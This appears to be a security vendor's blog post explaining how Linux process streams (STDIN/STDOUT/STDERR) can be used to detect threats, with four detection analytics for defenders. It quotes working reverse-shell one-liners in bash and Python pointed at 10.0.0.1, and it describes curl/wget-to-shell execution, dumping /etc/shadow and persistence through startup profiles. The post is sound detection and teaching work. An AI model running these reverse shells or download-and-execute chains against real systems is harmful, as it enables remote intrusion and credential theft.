How process streams can help you detect Linux threats

The Red Canary CIRT is always looking for creative new methods to detect threats, and much of that effort on Linux makes its way into our own Linux EDR sensor. One such method we’ve found useful is examining standard process streams. This blog will break down what process streams are, how they are required for basic shell functionality on Linux, and how you can leverage them to detect evil in your environment, along with some specific detection analytics we’ve had success with.

What are process streams?

Process streams refer to the various file-like handles that a process can read from and/or write to. They are a normal part of UNIX-based operating systems, like Linux, and are used for a wide variety of tasks, like cleaning up leftover Docker containers, searching through logs, and finding files with specific extensions:

$ docker ps -a | xargs -I % kill -9 %
$ cat /var/log/security | grep "failed" | sort | uniq -c
$ find . -name "*.ini" 2>/dev/null

On Linux, each process starts with three default streams open:

Default process stream	Corresponding hardware	Typical file descriptor
Default process stream : Standard Input (STDIN)	Corresponding hardware : keyboard	Typical file descriptor : `0`
Default process stream : Standard Output (STDOUT)	Corresponding hardware : screen	Typical file descriptor : `1`
Default process stream : Standard Error (STDERR)	Corresponding hardware : screen	Typical file descriptor : `2`

These streams can also be redirected to (or represent) other sources, such as text files, device drivers, and other processes. While these standard process streams are used by default, additional streams can be created using tools like Bash or system calls like fopen().

How do you find a process’s open streams?

The procfs filesystem exposes a ton of data about individual processes, including their open file descriptors, which are numeric identifiers associated with each open file handle for a process. Within procfs, we can find these descriptors as symbolic links under the /proc/$PID/fs/ directory, where $PID refers to the running process’s identifier and the links point to the descriptor destination.

Remember: STDIN has a file descriptor of 0, STDOUT has a file descriptor of 1, and STDERR has a file descriptor of 2.

Additionally, the system utility List Open Files (lsof) can walk this directory for any given process, with the additional benefit of displaying process names when a pipe is used. The example below shows how the processes cat and sleep are connected by pipe 347077:

How do adversaries use process streams?

Interactively spawning a process

Process streams are commonly used in interactive terminals—e.g., taking input from a keyboard and outputting data to a computer screen. Since STDIN and STDOUT are both concerned with hardware, these interactive processes use special devices in the /dev/ folder. For detection, we haven’t found a use case where the keyboard input is useful, but when STDOUT is pointing to a terminal device,* it’s a strong indication that the process was executed interactively, and we can use additional attributes to build robust detectors.

For example, rarely would anyone need to view the contents of the /etc/shadow file directly in an interactive terminal. This sensitive file contains password hashes of every user on the system, and if an adversary is able to dump its contents to the screen, they could attempt to crack those passwords offline after copying them to another system. To detect this, we can simply look for commands referencing /etc/shadow and pointing one or multiple standard streams to a terminal device. Bonus: this works just as well inside containers, since the interactive terminal devices don’t change.

*On most Linux distributions, the terminal points to a device file with the pattern /dev/ttyN or /dev/pts/N, where N is the device ID.

Reverse shells

Reverse shells are an interesting use case for manipulating process streams as well, since there are a lot of examples on the internet with wildly varying syntax. This variation makes command-line detection difficult, but by focusing on the reverse shell’s process streams, we’re able to reliably detect a large number of variations. Let’s take a look at a few common examples from Pentest Monkey’s Reverse Shell Cheat Sheet:

$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

This example uses file descriptors for STDIN (0) and STDOUT (1) and some special shell syntax to redirect the streams back into each other, creating the reverse shell:

A network socket is opened by the current shell (the reverse shell’s parent) to the remote host using the bash-ism /dev/tcp/<IP>/<PORT>
The reverse shell’s STDOUT is redirected to the remote host via the network socket (>&)
The reverse shell’s STDIN is redirected to the same place STDOUT was previously directed to the network socket (0>&1)
Finally, an interactive shell is spawned as a child process with the existing streams and bash -i as the command line

Most of these steps happen as the result of special syntax interpreted by the existing shell process, so they do not get passed into the Linux kernel when the process is created. This can look pretty strange in most EDR sensors: usually it will just appear as a shell process with only bash -i as the command line and no other information.

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

While extremely similar to the previous one, this variation uses Python standard libraries instead of special bash syntax to open a network connection and set up the reverse shell:

The Python interpreter opens a network socket to the remote host using functions in the standard socket library
All three standard streams (STDIN/STDOUT/STDERR) are modified to reference the network socket with os.dup2()
Finally, an interactive shell spawns with the existing streams set up and /bin/sh -i as the command line

The basic workflow for this looks a lot like the first example, and the outcome is the same: a new reverse shell!

Detection opportunity 1

The following detection logic can be used to detect most variations of reverse shells regardless of if they use Bash, Python, Java, or any other similar utility:

process_name == *sh
&&
standard_input == socket:[*]
&&
standard_output == socket:[*]

When examining processes using network sockets in this way, the process stream will take the format socket:[<number>] and link to the corresponding network socket; the number is the identifier for this socket.

Additional considerations for detection logic may include:

non-standard file descriptors being used
named pipes placed between a process and the network socket (commonly seen with variations on “netcat without the -e” reverse shells)

Malicious script download and execution without touching disk

A common method of evading detection involves downloading malicious scripts and piping them directly into a shell to execute. This tactic avoids writing anything to disk, where a good antivirus can detect and remediate a threat before a foothold can be established. In our experience, this tactic is most commonly used by groups attempting to deploy cryptominers (because of course).

Every version of this attack pattern we’ve seen goes something like:

A system binary is used to download the shell script from a remote host—most often curl or wget
The downloader then pipes its output to a shell via STDOUT
The shell reads the malicious script from STDIN and executes commands accordingly

Since the downloader process is piping directly into the shell, its STDOUT will align with the shell’s STDIN. Even when additional processes are placed between the download and execution of the shell script, this chain of STDIN/STDOUT can be followed to understand how malicious commands are being processed, such as when the malicious script needs to be Base64 decoded before execution.

Detection opportunity 2

A detection analytic for this technique is fairly straightforward, but data collection may pose a problem. Unfortunately, there is no single telemetry source that correlates the reader and writer of a pipe, but that data can be found scattered across various locations in the /proc/ filesystem, including an individual process’s file descriptors (/proc/$PID/fd/), and the global net connections files (e.g., /proc/net/tcp):

process_name == *sh
&&
standard_input ==pipe:[*]
&&
(standard_input_process == curl || standard_input_process == wget)

Detection opportunity 3

Or, to catch variations where Base64 encoding is used, focus on base64 and examine both its STDIN and STDOUT pipes simultaneously:

process_name == base64
&&
standard_input == pipe:[*]
&&
(standard_input_process == curl || standard_input_process == wget)
&&
standard_output == pipe:[*]
&&
standard_output_process == *sh

Like the sockets in the previous example, the process stream will take the format pipe:[<number>] and use the ID of the corresponding unnamed pipe as the number. Additional effort is required to resolve the process on the other end of that pipe.

You should also consider the following when writing detection logic:

Scheduling services such as crond or atd initiating these commands
The user account associated with these processes. This may be normal for a developer account, but a webserver user like www-data probably should not be performing this activity

Appending a command to a startup profile

Lastly, many locations on Linux systems store scripts designed to execute commands based on some predefined event, such as system startup, a user logging in, or a specific time elapsing. Many malware families have used these locations to persist on systems by appending to existing scripts, which helps avoid suspicion from curious administrators.

Detection opportunity 4

Often when we see this activity, it takes the form of shell commands echoing data directly to a file. System services, such as cron or web servers, will leverage the Bourne shell to execute commands as child processes using the sh -c syntax with a redirection to the intended startup profile. When this happens, the shell will execute the command and overwrite the STDOUT stream with the startup profile, as seen with the following detection analytic:

process_name == sh
&&
(standard_output == /etc/rc.d/* || standard_output == /etc/rc.local ||
standard_output == .*rc || standard_output == .*profile)

Just a handful of common startup locations are used above, but there are many possible locations depending on what software is installed, what subsystems are used, etc. Surveying your environment ahead of time can help you understand which profiles are likely to be present on a given host.

Now streaming

Process streams are another building block of endpoint detection. On UNIX-based operating systems, every process opens with three standard streams that can be used in conjunction with other attributes to build robust detections. Many common attack techniques use them without even intending to, and, though it is possible for adversaries using process streams to evade scrutiny, it is much more difficult than other artifacts used for detection, such as command lines or process names.

Look beyond processes with Linux EDR

Linux security

Resources • Blog Linux security

How process streams can help you detect Linux threats

Thomas Gardner•

What are process streams?

How do you find a process’s open streams?

How do adversaries use process streams?

Interactively spawning a process

Reverse shells

Detection opportunity 1

Malicious script download and execution without touching disk

Detection opportunity 2

Detection opportunity 3

Appending a command to a startup profile

Detection opportunity 4

Now streaming

Related Articles

Look beyond processes with Linux EDR

Contain yourself: An intro to Linux EDR

eBPFmon: A new tool for exploring and interacting with eBPF applications

eBPF: A new frontier for malware

Subscribe to our blog

See what it's like to have a security ally.

Experience the difference between a sense of security and actual security.